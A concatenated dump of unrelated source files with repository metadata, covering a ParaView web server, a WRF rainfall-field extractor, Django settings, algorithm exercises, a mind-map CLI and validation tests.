self.registerVtkWebProtocol(pv_protocols.ParaViewWebStartupRemoteConnection(_PipelineManager.dsHost, _PipelineManager.dsPort, _PipelineManager.rsHost, _PipelineManager.rsPort))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebStateLoader(_PipelineManager.fileToLoad))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebPipelineManager(_PipelineManager.dataDir, _PipelineManager.fileToLoad))
self.registerVtkWebProtocol(pv_protocols.ParaViewWebMouseHandler())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPort())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortImageDelivery())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortGeometryDelivery())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebTimeHandler())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebRemoteConnection())
self.registerVtkWebProtocol(pv_protocols.ParaViewWebFileManager(_PipelineManager.dataDir))
# Update authentication key to use
self.updateSecret(_PipelineManager.authKey)
# =============================================================================
# Main: Parse args and start server
# =============================================================================
if __name__ == "__main__":
# Create argument parser
parser = argparse.ArgumentParser(description="ParaView/Web Pipeline Manager web-application")
# Add default arguments
server.add_arguments(parser)
# Add local arguments
parser.add_argument("--data-dir", default=os.getcwd(), help="path to data directory to list", dest="path")
parser.add_argument("--load-file", default=None, help="File to load if any based on data-dir base path", dest="file")
parser.add_argument("--ds-host", default=None, help="Hostname to connect to for DataServer", dest="dsHost")
parser.add_argument("--ds-port", default=11111, type=int, help="Port number to connect to for DataServer", dest="dsPort")
parser.add_argument("--rs-host", default=None, help="Hostname to connect to for RenderServer", dest="rsHost")
parser.add_argument("--rs-port", default=11111, type=int, help="Port number to connect to for RenderServer", dest="rsPort")
# Exctract arguments
args = parser.parse_args()
# Configure our current application
_PipelineManager.authKey = args.authKey
_PipelineManager.dataDir = args.path
_PipelineManager.dsHost = args.dsHost
_PipelineManager.dsPort = args.dsPort
_PipelineManager.rsHost = args.rsHost
_PipelineManager.rsPort = args.rsPort
if args.file:
_PipelineManager.fileToLoad = args.path + '/' + args.file
# Start server
server.start_webserver(options=args, protocol=_PipelineManager)
|
[
"[email protected]"
] | |
aa80166792010844c80020d87de369afec96d42a
|
5eff9df4d276e83c68ce843d58868499858f701a
|
/Leetcode - FB/p0350.py
|
3780986eb5c2d856d4e29deeeacac48b9f10fdf7
|
[] |
no_license
|
arunraman/Code-Katas
|
b6723deb00caed58f0c9a1cafdbe807e39e96961
|
7fe3582fa6acf59a2620fe73e1e14bd8635bbee8
|
refs/heads/master
| 2023-03-04T17:27:44.037145 | 2023-03-02T21:09:53 | 2023-03-02T21:09:53 | 25,232,784 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 456 |
py
|
class p0349(object):
def intersectiontwoArrays(self, nums1, nums2):
dict1 = dict()
for i in nums1:
if i not in dict1:
dict1[i] = 1
else:
dict1[i] += 1
ret = []
for i in nums2:
if i in dict1 and dict1[i] > 0:
ret.append(i)
dict1[i] -= 1
return ret
S = p0349()
print S.intersectiontwoArrays([1, 2, 2, 1], [2, 2])
|
[
"[email protected]"
] | |
205e2c6f3f8e1f3fd358d21e4ccbb1da32701a93
|
021a3dff055d4b3e40aafc63f0029dc280466233
|
/db_scripts/curw_fcst/rfield/gen_rfield_kelani_basin_parallelized_optimized.py
|
e2bed1eb35b657a3592bea9d212fe72a3c8b6482
|
[] |
no_license
|
shadhini/curw_helpers
|
45efe90d887c702b3a3f5877163647e220d230e4
|
101d896f8b589b478ef146b5b4dd99ec24f2dc84
|
refs/heads/master
| 2021-07-03T02:53:13.398052 | 2020-10-28T03:39:58 | 2020-10-28T03:39:58 | 185,217,580 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,854 |
py
|
#!/home/uwcc-admin/curw_rfield_extractor/venv/bin/python3
import traceback
import pymysql
import json
import getopt
import sys
import os
import re
import multiprocessing as mp
from datetime import datetime, timedelta
# connection params
HOST = ""
USER = ""
PASSWORD = ""
DB =""
PORT = ""
VALID_MODELS = ["WRF_A", "WRF_C", "WRF_E", "WRF_SE"]
VALID_VERSIONS = ["v3", "v4", "4.0"]
SIM_TAGS = ["evening_18hrs"]
root_directory = '/var/www/html'
bucket_root = '/mnt/disks/wrf_nfs'
def read_attribute_from_config_file(attribute, config):
"""
:param attribute: key name of the config json file
:param config: loaded json file
:return:
"""
if attribute in config and (config[attribute]!=""):
return config[attribute]
else:
print("{} not specified in config file.".format(attribute))
exit(1)
def write_to_file(file_name, data):
with open(file_name, 'w+') as f:
f.write('\n'.join(data))
def create_rfield(connection, wrf_model, version, sim_tag, timestamp):
# rfield = [['latitude', 'longitude', 'rainfall']]
rfield = []
with connection.cursor() as cursor0:
cursor0.callproc('get_d03_rfield_kelani_basin_rainfall', (wrf_model, version, sim_tag, timestamp))
results = cursor0.fetchall()
for result in results:
rfield.append('{}'.format(result.get('value')))
write_to_file('{}/wrf/{}/{}/rfield/kelani_basin/{}_{}_{}_rfield.txt'
.format(root_directory, version, sim_tag, wrf_model, version, timestamp.strftime('%Y-%m-%d_%H-%M')), rfield)
#############################
# Raw WRF RFIELD GENERATION #
#############################
def gen_rfield_d03_kelani_basin(wrf_model, version, sim_tag):
# remove outdated rfields
try:
os.system("sudo rm {}/wrf/{}/{}/rfield/kelani_basin/{}_{}_*".format(root_directory, version, sim_tag, wrf_model, version))
except Exception as e:
traceback.print_exc()
start_time = ''
end_time = ''
now = datetime.strptime((datetime.now()+timedelta(hours=5, minutes=30)).strftime('%Y-%m-%d 00:00:00'), '%Y-%m-%d %H:%M:%S')
try:
# Connect to the database
connection = pymysql.connect(host=HOST, user=USER, password=PASSWORD, db=DB,
cursorclass=pymysql.cursors.DictCursor)
# Extract timeseries start time and end time
with connection.cursor() as cursor1:
cursor1.callproc('get_TS_start_end', (wrf_model, version, sim_tag))
result = cursor1.fetchone()
start_time = result.get('start')
end_time = result.get('end')
if end_time > (now + timedelta(days=1)):
# Extract rfields
timestamp = start_time
while timestamp <= end_time:
create_rfield(connection=connection, wrf_model=wrf_model, version=version, sim_tag=sim_tag,
timestamp=timestamp)
timestamp = datetime.strptime(str(timestamp), '%Y-%m-%d %H:%M:%S') + timedelta(minutes=15)
return True
except Exception as ex:
traceback.print_exc()
return False
finally:
connection.close()
print("Process finished")
def usage():
usageText = """
Usage: python gen_rfield_kelani_basin_parallelized_optimized_with_past_future.py -m WRF_X1,WRF_X2,WRF_X3 -v vX -s "evening_18hrs"
-h --help Show usage
-m --wrf_model List of WRF models (e.g. WRF_A, WRF_E). Compulsory arg
-v --version WRF model version (e.g. v4, v3). Compulsory arg
-s --sim_tag Simulation tag (e.g. evening_18hrs). Compulsory arg
"""
print(usageText)
if __name__=="__main__":
my_pool = None
try:
wrf_models = None
version = None
sim_tag = None
try:
opts, args = getopt.getopt(sys.argv[1:], "h:m:v:s:",
["help", "wrf_model=", "version=", "sim_tag="])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit()
elif opt in ("-m", "--wrf_model"):
wrf_models = arg.strip()
elif opt in ("-v", "--version"):
version = arg.strip()
elif opt in ("-s", "--sim_tag"):
sim_tag = arg.strip()
print(wrf_models, version, sim_tag)
print(VALID_MODELS, VALID_VERSIONS, SIM_TAGS)
# load connection parameters
config = json.loads(open('/home/uwcc-admin/curw_rfield_extractor/db_config.json').read())
# connection params
HOST = read_attribute_from_config_file('host', config)
USER = read_attribute_from_config_file('user', config)
PASSWORD = read_attribute_from_config_file('password', config)
DB = read_attribute_from_config_file('db', config)
PORT = read_attribute_from_config_file('port', config)
wrf_model_list = wrf_models.split(',')
for wrf_model in wrf_model_list:
if wrf_model is None or wrf_model not in VALID_MODELS:
usage()
exit(1)
if version is None or version not in VALID_VERSIONS:
usage()
exit(1)
if sim_tag is None or sim_tag not in SIM_TAGS:
usage()
exit(1)
rfield_home = "{}/wrf/{}/{}/rfield/kelani_basin".format(root_directory, version, sim_tag)
try:
os.makedirs(rfield_home)
except FileExistsError:
# directory already exists
pass
gfs_data_hour =re.findall(r'\d+', sim_tag)[0]
bucket_rfield_home = "{}/wrf/{}/{}/rfield/kelani_basin".format(bucket_root, version, gfs_data_hour)
try:
os.makedirs(bucket_rfield_home)
except FileExistsError:
# directory already exists
pass
# copy file containing xy coordinates to the rfield home
try:
os.system("cp kelani_basin_xy.csv {}/xy.csv".format(rfield_home))
except Exception:
pass
mp_pool = mp.Pool(mp.cpu_count())
results = mp_pool.starmap(gen_rfield_d03_kelani_basin,
[(wrf_model, version, sim_tag) for wrf_model in wrf_model_list])
# results = mp_pool.starmap_async(gen_rfield_d03_kelani_basin,
# [(wrf_model, version, sim_tag) for wrf_model in wrf_model_list]).get()
print("results: ", results)
except Exception as e:
print('JSON config data loading error.')
traceback.print_exc()
finally:
if my_pool is not None:
mp_pool.close()
os.system("tar -czvf {}/rfield.tar.gz {}/*".format(bucket_rfield_home, rfield_home))
|
[
"[email protected]"
] | |
d1f9c5d8fe6a52dd2e130204f45e94850dfa5e0f
|
33f86c1678d2f5e15da77885e0bf770f405201a4
|
/tcamp/local_settings.example.py
|
b5b48f86971536c25ec25d5c61d13c2805a1304e
|
[
"BSD-3-Clause"
] |
permissive
|
imclab/tcamp
|
5410c9549ed7731575e7312acfed7b8e4cd0c58d
|
111cabab90b2c8cf651ee480520bc43a33f30844
|
refs/heads/master
| 2021-01-18T12:15:58.484183 | 2014-03-05T21:36:00 | 2014-03-05T21:36:06 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,832 |
py
|
DEBUG = True
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
INTERNAL_IPS = ('127.0.0.1', )
SECRET_KEY = ''
DATABASES = {
'local': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
},
'staging': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
},
'production': {
'ENGINE': '', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
DATABASES['default'] = DATABASES['local']
FAVICON = ''
APPLE_TOUCH_ICON = ''
SHARING_IMAGE = ''
FB_APP_ID = ''
GOOGLE_ANALYTICS_ID = ''
AWS_ACCESS_KEY_ID = ''
AWS_SECRET_ACCESS_KEY = ''
ASSET_SITE_VERSION = '1.0'
COMPRESS_URL = ''
COMPRESS_STORAGE = ''
STATICFILES_STORAGE = COMPRESS_STORAGE
STATIC_URL = COMPRESS_URL
POSTMARK_API_KEY = ''
POSTMARK_SENDER = ''
GOOGLEAUTH_DOMAIN = ''
GOOGLEAUTH_REALM = ''
TWITTER_CONSUMER_KEY = ''
TWITTER_CONSUMER_SECRET = ''
FACEBOOK_APP_ID = ''
FACEBOOK_API_SECRET = ''
GOOGLE_OAUTH2_CLIENT_ID = ''
GOOGLE_OAUTH2_CLIENT_SECRET = ''
GITHUB_APP_ID = ''
GITHUB_API_SECRET = ''
DISQUS_CLIENT_ID = ''
DISQUS_CLIENT_SECRET = ''
AKISMET_KEY = ''
TWITTER_CONSUMER_KEY = ''
TWITTER_CONSUMER_SECRET = ''
TWITTER_ACCESS_KEY = ''
TWITTER_ACCESS_SECRET = ''
DISQUS_SHORTNAME = ''
BRAINSTORM_USE_DISQUS = True
BRAINSTORM_LOGIN_OPTIONS = (
('Twitter', '/login/twitter/'),
('Facebook', '/login/facebook/'),
('Google', '/login/google-oauth2/'),
('Github', '/login/github/'),
)
VARNISH_MANAGEMENT_ADDRS = ()
TWILIO_ACCOUNT_SID = ''
TWILIO_AUTH_TOKEN = ''
RAVEN_CONFIG = {
'dsn': '',
}
|
[
"[email protected]"
] | |
af0ff074d35191259400a9937db81997e7772ffd
|
d52cb4c2e880875944b14da0b8a9542235942ac8
|
/geeksforgeeks/heap/6_Find_median_in_stream.py
|
521a8f79468f59a0c175f5766c7681ae8d0a619c
|
[] |
no_license
|
saparia-data/data_structure
|
fbd61535b68f92143b2cb2679377c0f56f424670
|
2e8700cfdaeefe0093e5b4fb2704b1abcd300d02
|
refs/heads/master
| 2023-05-08T18:54:52.250941 | 2021-06-04T05:44:29 | 2021-06-04T05:44:29 | 296,071,146 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,382 |
py
|
'''
Given an input stream of N integers.
The task is to insert these numbers into a new stream and find the median of the stream formed by each insertion of X to the new stream.
Example 1:
Input:
N = 4
X[] = 5,15,1,3
Output:
5
10
5
4
Explanation:Flow in stream : 5, 15, 1, 3
5 goes to stream --> median 5 (5)
15 goes to stream --> median 10 (5,15)
1 goes to stream --> median 5 (5,15,1)
3 goes to stream --> median 4 (5,15,1 3)
'''
import heapq
min_heap = []
max_heap = []
def balanceHeaps():
'''
use globals min_heap and max_heap, as per declared in driver code
use heapify modules , already imported by driver code
Balance the two heaps size , such that difference is not more than one.
'''
if abs(len(min_heap)-len(max_heap)) <= 1:
return # already balanced
# take out one element from top of heap with greater size, and push in other heap
if len(min_heap)>len(max_heap): # min_heap has more data
value_top = heapq.heappop(min_heap)
# push in max heap, using negative as it is implemented on min heap
heapq.heappush(max_heap,-1*value_top) # value inserted in max heap
else:
# take from max heap and insert in min heap
value_top = -1* heapq.heappop(max_heap) # negate it to get original value
heapq.heappush(min_heap,value_top) # insert value in min heap
return
def getMedian():
'''
use globals min_heap and max_heap, as per declared in driver code
use heapify modules , already imported by driver code
:return: return the median of the data received till now.
'''
# cases with odd number of elements in data
if len(max_heap)>len(min_heap):
# return the element from top of max_heap
value = heapq.heappop(max_heap)
heapq.heappush(max_heap,value) # push element back in max heap
return (-1*value)
elif len(min_heap)>len(max_heap):
# return the top element from min heap
value = heapq.heappop(min_heap)
heapq.heappush(min_heap,value)
return value
else:
# the number of elements is even in data, return the average of the two values
val_min = heapq.heappop(min_heap)
val_max = -1*heapq.heappop(max_heap)
# push these values back in the heap
heapq.heappush(min_heap,val_min)
heapq.heappush(max_heap,-1*val_max)
return ((val_max+val_min)//2) # return the average of the two
def insertHeaps(x):
'''
use globals min_heap and max_heap, as per declared in driver code
use heapify modules , already imported by driver code
:param x: value to be inserted
:return: None
'''
# if top of min heap is less than x, x belongs in upper half
least_upperhalf = heapq.heappop(min_heap) if len(min_heap) else -1 # minimum element of upper half or -1 if empty
# if popped, push in min_heap again
if least_upperhalf!=-1:
heapq.heappush(min_heap,least_upperhalf)
if x >= least_upperhalf :
heapq.heappush(min_heap,x) # insert in min_heap
else:
# x belongs in lower half
# as this is a max_heap implemented on heapq, hence negative of x will be inserted to maintain
# max heap property.
heapq.heappush(max_heap,-1*x)
arr = [5,15,1,3]
n = len(arr)
for i in range(n):
insertHeaps(arr[i])
balanceHeaps()
print(getMedian())
|
[
"[email protected]"
] | |
a15aa9381f0639460207512eace0c0e66ea54b4b
|
d554b1aa8b70fddf81da8988b4aaa43788fede88
|
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4327/codes/1602_2049.py
|
1ce019700e7801903c6df341e812f94f4b2cb946
|
[] |
no_license
|
JosephLevinthal/Research-projects
|
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
|
60d5fd6eb864a5181f4321e7a992812f3c2139f9
|
refs/heads/master
| 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 302 |
py
|
# Teste seu codigo aos poucos.
# Nao teste tudo no final, pois fica mais dificil de identificar erros.
# Nao se intimide com as mensagens de erro. Elas ajudam a corrigir seu codigo.
x=int(input("informe o dividendo: " ))
y=int(input("informe o divisor: " ))
print (x)
print (y)
print (x//y)
print (x%y)
|
[
"[email protected]"
] | |
eaa1694453e2fb1d8f4e20c3a6a0852dc8c2f92c
|
bec66ec0c920939547466b2b8f9d65813d560d1d
|
/noxious/__init__.py
|
f007d1198e0435f72d773eb479f29a48d9534092
|
[] |
no_license
|
mbr/noxious
|
cbb3be2ca725a0282db390520306da7ebba75339
|
6c48fe84867d80614defa6bdce4d4640ce657ae5
|
refs/heads/master
| 2023-06-06T20:42:08.079423 | 2015-08-30T10:54:52 | 2015-08-30T10:54:52 | 41,625,389 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,557 |
py
|
import xml.etree.ElementTree as ET
def from_file(fn):
tree = ET.parse(fn)
return Noxious(tree.getroot())
class Noxious(object):
def __init__(self, elem, parent=None):
self._parent = parent
self._elem = elem
def _all(self):
return [self.__class__(sibling)
for sibling in self._parent._elem.findall(self._elem.tag)]
def _get_path(self):
path = []
tag = self
while tag:
path.insert(0, tag._elem.tag)
tag = tag._parent
root = path.pop(0)
return root + ''.join('[{!r}]'.format(p) for p in path)
def _text(self):
return self._elem.text
def __add__(self, other):
return str(self) + other
def __bool__(self):
e = self._elem
return bool(e.text or list(e))
def __float__(self):
return float(str(self))
def __int__(self):
return int(str(self))
def __getitem__(self, name):
child = self._elem.find(name)
if child is None:
raise KeyError('No child {} on {!r}'.format(name, self))
return self.__class__(child, self)
def __getattr__(self, name):
if name not in self._elem.attrib:
raise AttributeError('No attribute {} on {!r}'.format(name, self))
return self._elem.attrib[name]
# py2:
__nonzero__ = __bool__
def __radd__(self, other):
return other + str(self)
def __str__(self):
return self._text()
def __repr__(self):
return self._get_path()
|
[
"[email protected]"
] | |
4b2654ba6bffd9e20cf44a960e8ed5166476ba81
|
749aca95edfaad9e7d8b84dc2c6f62038595efc3
|
/mandala.py
|
dac1d0eae959c6a652cc1f391088ca60e9419b56
|
[] |
no_license
|
xmduhan/mandala
|
efe72b116ec829457cd2286b88b4544d5538861c
|
eafea6c9ebd0ca913c070f0bf2cbf72a6566b0a7
|
refs/heads/master
| 2021-06-30T16:30:49.410637 | 2017-09-20T09:44:53 | 2017-09-20T09:44:53 | 104,153,412 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,494 |
py
|
#!/usr/bin/env python
# encoding: utf-8
import dataset
from pyfiglet import Figlet
from termcolor import cprint
from prompt_toolkit import prompt as _prompt
from prompt_toolkit.history import InMemoryHistory
from itertools import count
from treelib import Tree
from pandas import DataFrame
history = InMemoryHistory()
db = dataset.connect('sqlite:///db.sqlite')
table = db['relation']
db.begin()
def commit():
""" """
db.commit()
db.begin()
print u'保存成功!'
def rollback():
""" """
db.rollback()
db.begin()
print u'操作撤销'
def save(w0, w1):
""" """
table.insert({'w0': w0, 'w1': w1})
# print u'%s --> %s: ' % (w0, w1)
cprint(' |-- ', 'green', end='')
cprint('%s --> %s: ' % (w0, w1), color='blue', end='')
cprint('+1', 'red')
def prompt(text):
return _prompt(text, history=history).strip()
def star(w0=None):
""" """
if w0 is None:
w0 = prompt(u'关键词:')
if len(w0) == 0:
return
for i in count(start=1, step=1):
w1 = prompt(u'%s --> (%d):' % (w0, i))
if len(w1) == 0:
break
save(w0, w1)
def chain(w0=None):
""" """
if w0 is None:
w0 = prompt(u'关键词:')
if len(w0) == 0:
return
for i in count(start=1, step=1):
w1 = prompt(u'%s --> (%d):' % (w0, i))
if len(w1) == 0:
break
save(w0, w1)
w0 = w1
def readLevel():
while True:
levelString = prompt(u'最大递归级数(3):')
if len(levelString) == 0:
levelString = 3
try:
level = int(levelString)
return level
except Exception:
print u'输入有误, 必须是整数!'
def lookup():
""" """
w0 = prompt(u'关键字:')
level = readLevel()
qs = db.query('select w0, w1, count(*) n from relation group by w0, w1')
df = DataFrame(list(qs))
tree = Tree()
tree.create_node(w0, w0)
appendList = []
def append(w0, level=5):
if w0 in appendList or level == 0:
return
appendList.append(w0)
for i, row in df[df['w0'] == w0].iterrows():
w1 = row['w1']
n = row['n']
# print w0, '-->', w1
if w1 not in tree:
title = '%s[%d]' % (w1, n)
tree.create_node(title, w1, parent=w0)
else:
# 出现循环
title = '%s[%d](*)' % (w1, n)
tree.create_node(title, i, parent=w0)
append(w1, level - 1)
append(w0, level)
tree.show()
def quit():
""" """
print u'再见!'
db.rollback()
exit()
def help():
""" """
print u'star: 星型添加'
print u'chain: 链式添加'
print u'commit: 保存'
print u'rollback: 取消'
print u'lookup: 查找'
print u'quit: 退出'
print u'help: 帮助'
commands = {
'star': star,
'chain': chain,
'lookup': lookup,
'commit': commit,
'rollback': rollback,
'quit': quit,
'help': help,
}
def main():
""" """
# 打印logo
f = Figlet(font='slant')
print f.renderText('Mandala')
# 读取并执行命令
try:
while True:
cmd = prompt(u'mandala>')
if cmd in commands:
commands[cmd]()
else:
print u'无效命令'
except KeyboardInterrupt:
quit()
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
35da38996a54cfbccf733b5859960068514b4714
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2332/60592/271480.py
|
f602a8c01f31dbba291aa53971306002fff48fef
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 630 |
py
|
base = int(input())
tar = int(input())
res = 0
fun = []
te = 0
tem = tar
while tem != 0:
i = 0
if tem == 1:
te += 1
break
mark = 0
while mark <= tem:
mark = pow(base,i)
i+=1
te+=i-3
mark/=base
tem-=mark
if tem!= 0:
te+=1
fun.append(te)
te = 0
tem = tar
while tem != 0:
i = 0
if tem == 1 or tem == -1:
te+=1
break
mark = 0
while mark < abs(tem):
mark = pow(base,i)
i+=1
te+=i-2
if tem < 0:
tem+=mark
elif tem>0:
tem-=mark
if tem != 0:
te+=1
fun.append(te)
print(min(fun))
|
[
"[email protected]"
] | |
516a6530d09f3f2717a8b0cf0e85c849bb9f4ad0
|
f63907d2115becd64704ef1881f3bfcb7ba9047d
|
/sandbox/test/testTemplate.py
|
91ba4b483092ee7a004dca1be860007bfd13cdaa
|
[] |
no_license
|
AseiSugiyama/NZMATH-Python3
|
d456610f72071a654531583228e439ffa8a4db0c
|
f65b176be2e58fafa0eea91f399c9ab17f3f478b
|
refs/heads/master
| 2020-05-21T07:26:51.434191 | 2019-04-27T09:52:18 | 2019-04-27T09:52:18 | 185,959,644 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 989 |
py
|
import unittest
import sandbox.hoge as hoge
class HogeTest (unittest.TestCase):
"""
Test classes must inherite unittest.TestCase.
They have name suffixed with 'Test'.
"""
def setUp(self):
"""
setUp is run before each test method run.
"""
pass
def tearDown(self):
"""
tearDown is run after each test method run.
"""
pass
def testHuga(self):
"""
Every test method have name prefixed with 'test'.
"""
# asserting something
self.assert_(hoge.ishoge(), "optional message string")
# asserting equality
self.assertEqual(1, hoge.huga)
# The following part is always unedited.
def suite(suffix="Test"):
suite = unittest.TestSuite()
all_names = globals()
for name in all_names:
if name.endswith(suffix):
suite.addTest(unittest.makeSuite(all_names[name], "test"))
return suite
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
|
[
"devnull@localhost"
] |
devnull@localhost
|
2b900473f8ebad3774236008a4ce12609bd077c4
|
c4af67db4c523d20f2d55aef90ba77db1fb53c38
|
/validation/tests/test_validation.py
|
c1128b9d609b6db323abf0d49d809d2207be7177
|
[] |
no_license
|
dtgit/dtedu
|
e59b16612d7d9ea064026bf80a44657082ef45a3
|
d787885fe7ed0de6f9e40e9b05d852a0e9d60677
|
refs/heads/master
| 2020-04-06T05:22:50.025074 | 2009-04-08T20:13:20 | 2009-04-08T20:13:20 | 171,351 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,060 |
py
|
from Testing import ZopeTestCase
from Products.Archetypes.tests.atsitetestcase import ATSiteTestCase
from Testing.ZopeTestCase import doctest
from Products.validation import validation
class TestValidation(ATSiteTestCase):
def test_inNumericRange(self):
v = validation.validatorFor('inNumericRange')
self.failUnlessEqual(v(10, 1, 20), 1)
self.failUnlessEqual(v('10', 1, 20), 1)
self.failIfEqual(v(0, 4, 5), 1)
def test_isPrintable(self):
v = validation.validatorFor('isPrintable')
self.failUnlessEqual(v('text'), 1)
self.failIfEqual(v('\u203'), 1)
self.failIfEqual(v(10), 1)
def test_isSSN(self):
v = validation.validatorFor('isSSN')
self.failUnlessEqual(v('111223333'), 1)
self.failUnlessEqual(v('111-22-3333', ignore=r'-'), 1)
def test_isUSPhoneNumber(self):
v = validation.validatorFor('isUSPhoneNumber')
self.failUnlessEqual(v('(212) 555-1212',
ignore=r'[\s\(\)\-]'), 1)
self.failUnlessEqual(v('2125551212',
ignore=r'[\s\(\)\-]'), 1)
self.failUnlessEqual(v('(212) 555-1212'), 1)
def test_isURL(self):
v = validation.validatorFor('isURL')
self.failUnlessEqual(v('http://foo.bar:8080/manage'), 1)
self.failUnlessEqual(v('https://foo.bar:8080/manage'), 1)
self.failUnlessEqual(v('irc://[email protected]:6667/#plone'), 1)
self.failUnlessEqual(v('fish://tiran:password@myserver/~/'), 1)
self.failIfEqual(v('http://\n'), 1)
self.failIfEqual(v('../foo/bar'), 1)
def test_isEmail(self):
v = validation.validatorFor('isEmail')
self.failUnlessEqual(v('[email protected]'), 1)
self.failIfEqual(v('@foo.bar'), 1)
self.failIfEqual(v('me'), 1)
def test_isMailto(self):
v = validation.validatorFor('isMailto')
self.failUnlessEqual(v('mailto:[email protected]'), 1)
self.failIfEqual(v('[email protected]'), 1)
self.failIfEqual(v('mailto:@foo.bar'), 1)
self.failIfEqual(v('@foo.bar'), 1)
self.failIfEqual(v('mailto:'), 1)
self.failIfEqual(v('me'), 1)
def test_isUnixLikeName(self):
v = validation.validatorFor('isUnixLikeName')
self.failUnlessEqual(v('abcd'), 1)
self.failUnless(v('a_123456'), 1)
self.failIfEqual(v('123'), 1)
self.failIfEqual(v('ab.c'), 1)
self.failIfEqual(v('ab,c'), 1)
self.failIfEqual(v('aaaaaaaab'), 1) # too long
def test_isValidId(self):
v = validation.validatorFor("isValidId")
self.failIfEqual(v("a b", object()), 1)
# TODO: more tests require a site
def test_suite():
from unittest import TestSuite, makeSuite
suite = TestSuite()
suite.addTest(makeSuite(TestValidation))
doctests = (
'Products.validation.validators.ExpressionValidator',
)
for module in doctests:
suite.addTest(doctest.DocTestSuite(module))
return suite
|
[
"[email protected]"
] | |
edd7334352747e1e9b08be0af986b1239e3ee6fe
|
5a25edcf994a760688dc7c933e8071bf4ff24df3
|
/exercises/ja/solution_01_08_01.py
|
01762ddd77ee431a33af88413c4449ddfc5b02bc
|
[
"CC-BY-NC-4.0",
"MIT"
] |
permissive
|
heyMP/spacy-course
|
8762990ed6179011680730d9c24d5d34c0a8d954
|
3740c717f0d1090b01c1b0fe23f8e30af3bf0101
|
refs/heads/master
| 2022-11-07T21:52:15.479840 | 2020-06-25T18:13:44 | 2020-06-25T18:13:44 | 275,202,487 | 1 | 0 |
MIT
| 2020-06-26T16:39:32 | 2020-06-26T16:39:31 | null |
UTF-8
|
Python
| false | false | 476 |
py
|
import spacy
nlp = spacy.load("en_core_web_sm")
text = "It’s official: Apple is the first U.S. public company to reach a $1 trillion market value"
# テキストを処理
doc = nlp(text)
for token in doc:
# トークンの文字列、品詞タグ、依存関係ラベルを取得
token_text = token.text
token_pos = token.pos_
token_dep = token.dep_
# フォーマットしてプリント
print(f"{token_text:<12}{token_pos:<10}{token_dep:<10}")
|
[
"[email protected]"
] | |
2f7b555b8a023acfc59b3616b78949d6bc53ab5f
|
3349a0d44da04fd9fae7728ce1315ccf0c82285e
|
/556A - case of zeroes and ones.py
|
c96ebf9ebc0e1aad3e01b362c37be5bd17da4cdb
|
[] |
no_license
|
umairnsr87/Data_Structures_Python
|
959848e546fd4f98959bc14470c26ce91bfb5c9c
|
05b5803521ed2ec7f64d95f08e2f014471dfdfd4
|
refs/heads/master
| 2023-07-18T12:11:55.245699 | 2023-07-16T17:01:09 | 2023-07-16T17:01:09 | 294,360,086 | 0 | 0 | null | 2023-07-16T17:01:10 | 2020-09-10T09:11:11 |
Python
|
UTF-8
|
Python
| false | false | 567 |
py
|
from collections import Counter
test = int(input())
strings = input()
# time complexity:O(n)
# while '01' or '10' in strings:
# if '01' in strings:
# strings = strings.replace('01', '')
# elif '10' in strings:
# strings = strings.replace('10', '')
# else:
# break
#
# print(len(strings))
# time complexity:O(1)
x = Counter(strings)
if (x['0'] == x['1']) and (x['0'] + x['1']) == len(strings):
print(0)
elif not x['1'] or not x['0']:
print(len(strings))
else:
a = min(x['0'], x['1'])
print(len(strings) - 2 * a)
|
[
"[email protected]"
] | |
e607164ee72ed5d0071b455388700dbe366a225e
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_windlasses.py
|
6ee113296ad40900fcef0fed2db7fb643eaa9caf
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
